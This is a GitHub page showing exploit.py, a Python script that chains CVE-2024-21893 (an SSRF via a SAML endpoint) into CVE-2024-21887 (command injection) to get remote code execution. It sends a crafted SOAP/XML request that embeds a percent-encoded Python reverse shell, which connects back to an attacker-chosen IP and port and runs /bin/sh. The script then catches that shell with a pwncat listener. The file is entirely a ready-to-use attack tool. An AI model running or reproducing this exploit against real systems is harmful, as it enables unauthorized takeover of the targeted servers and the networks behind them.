-
Notifications
You must be signed in to change notification settings - Fork 4
/
exploit.py
134 lines (113 loc) · 5.03 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
import socket
import argparse
import requests
import threading
import pwncat.manager
from rich.console import Console
class SSRF2RCE:
def __init__(self, base_url, rshell_ip=None, rshell_port=None):
"""
Initializes a new instance of the SSRF2RCE class.
:param base_url: The base URL of the server to which XML requests will be sent.
:param rshell_ip: The IP address for the reverse shell.
:param rshell_port: The port for the reverse shell.
"""
self.base_url = base_url
self.rshell_ip = rshell_ip
self.rshell_port = rshell_port
self.console = Console()
requests.packages.urllib3.disable_warnings(
requests.packages.urllib3.exceptions.InsecureRequestWarning
)
@staticmethod
def full_encode(s):
return "".join("%{:02X}".format(ord(c)) for c in s)
def custom_print(self, message: str, header: str) -> None:
header_colors = {"+": "green", "-": "red", "!": "yellow", "*": "blue"}
self.console.print(f"[{header_colors[header]}][{header}][/]{message}")
def start_listener(self, timeout=30) -> None:
if not (self.rshell_ip and self.rshell_port):
self.custom_print("Reverse shell IP or port not configured.", "!")
return
listener_thread = threading.Thread(
target=self._listen_for_revshell, args=(timeout,), daemon=True
)
listener_thread.start()
def _listen_for_revshell(self, timeout):
try:
with socket.create_server(
(self.rshell_ip, int(self.rshell_port))
) as listener:
listener.settimeout(timeout)
self.custom_print(
f"Waiting for incoming connection on port {self.rshell_port}...",
"*",
)
victim, victim_addr = listener.accept()
self.custom_print(
f"Received connection from {victim_addr[0]}:{victim_addr[1]}", "+"
)
with pwncat.manager.Manager() as manager:
manager.create_session(
platform="linux", protocol="socket", client=victim
)
self.custom_print("Dropping to pwncat prompt...", "+")
manager.interactive()
except socket.timeout:
self.custom_print(
f"No reverse shell connection received within {timeout} seconds.", "-"
)
except Exception as e:
self.custom_print(f"Error setting up listener: {e}", "-")
def send_xml(self, path="/dana-ws/saml20.ws"):
"""
Sends predefined XML data to a specific path on the server.
:param path: The relative path to the base URL for sending XML data.
:return: The server response as a string.
"""
string_to_encode = f';python -c \'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{self.rshell_ip}",{self.rshell_port}));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno());\''
encoded_string = self.full_encode(string_to_encode)
xml_data = f"""<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<ds:SignedInfo>
<ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
<ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
</ds:SignedInfo>
<ds:SignatureValue>qwerty</ds:SignatureValue>
<ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig#" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<ds:RetrievalMethod URI="http://127.0.0.1:8090/api/v1/license/keys-status/{encoded_string}"/>
<ds:X509Data/>
</ds:KeyInfo>
<ds:Object></ds:Object>
</ds:Signature>
</soap:Body>
</soap:Envelope>"""
url = self.base_url + path
headers = {"Content-Type": "text/xml"}
response = requests.post(url, data=xml_data, headers=headers, verify=False)
return response.text
def main():
parser = argparse.ArgumentParser(
description="CVE-2024-21893 to CVE-2024-21887 Exploit"
)
parser.add_argument(
"-u",
"--url",
type=str,
help="The base URL of the server to which XML data will be sent.",
)
parser.add_argument(
"-rip", "--rshell-ip", type=str, help="The IP address for the reverse shell."
)
parser.add_argument(
"-rport", "--rshell-port", type=int, help="The port for the reverse shell."
)
args = parser.parse_args()
xml_sender = SSRF2RCE(args.url, args.rshell_ip, args.rshell_port)
if args.rshell_ip and args.rshell_port:
xml_sender.start_listener()
xml_sender.send_xml()
if __name__ == "__main__":
main()